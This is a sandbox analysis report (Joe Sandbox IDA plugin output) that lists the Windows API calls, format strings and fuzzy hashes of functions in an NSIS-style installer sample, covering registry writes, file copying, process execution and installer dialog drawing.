                                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                          APIs
                                          • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                          • wsprintfA.USER32 ref: 00406B4D
                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                          • String ID: F$%s=%s$NUL$[Rename]
                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                          • DeleteObject.GDI32(?), ref: 004010F6
                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                          • DeleteObject.GDI32(?), ref: 0040116E
                                          • EndPaint.USER32(?,?), ref: 00401177
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                          Similarity
                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                          Strings
                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID: created uninstaller: %d, "%s"
                                          APIs
                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                          Similarity
                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                          Strings
                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                          • P}a, xrefs: 00402473
                                          Similarity
                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$P}a
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                          • GetSysColor.USER32(?), ref: 00403E2B
                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                          • DeleteObject.GDI32(?), ref: 00403E55
                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                          Strings
                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                          • Exec: command="%s", xrefs: 00402241
                                          • Exec: success ("%s"), xrefs: 00402263
                                          Similarity
                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                          • GetMessagePos.USER32 ref: 00404871
                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                          • MulDiv.KERNEL32(0001B200,00000064,?), ref: 00403295
                                          • wsprintfW.USER32 ref: 004032A5
                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040329F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                          APIs
                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                          • wsprintfW.USER32 ref: 00404457
                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s$@rD
                                          • API String ID: 3540041739-1813061909
                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":
                                          • API String ID: 589700163-165019052
                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                          APIs
                                          • GetDlgItem.USER32(?), ref: 004020A3
                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                          • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                          APIs
                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                          • API String ID: 1697273262-1764544995
                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404902
                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID: $@rD
                                          • API String ID: 3748168415-881980237
                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                          • lstrlenW.KERNEL32 ref: 004026B4
                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                          • String ID: CopyFiles "%s"->"%s"
                                          • API String ID: 2577523808-3778932970
                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
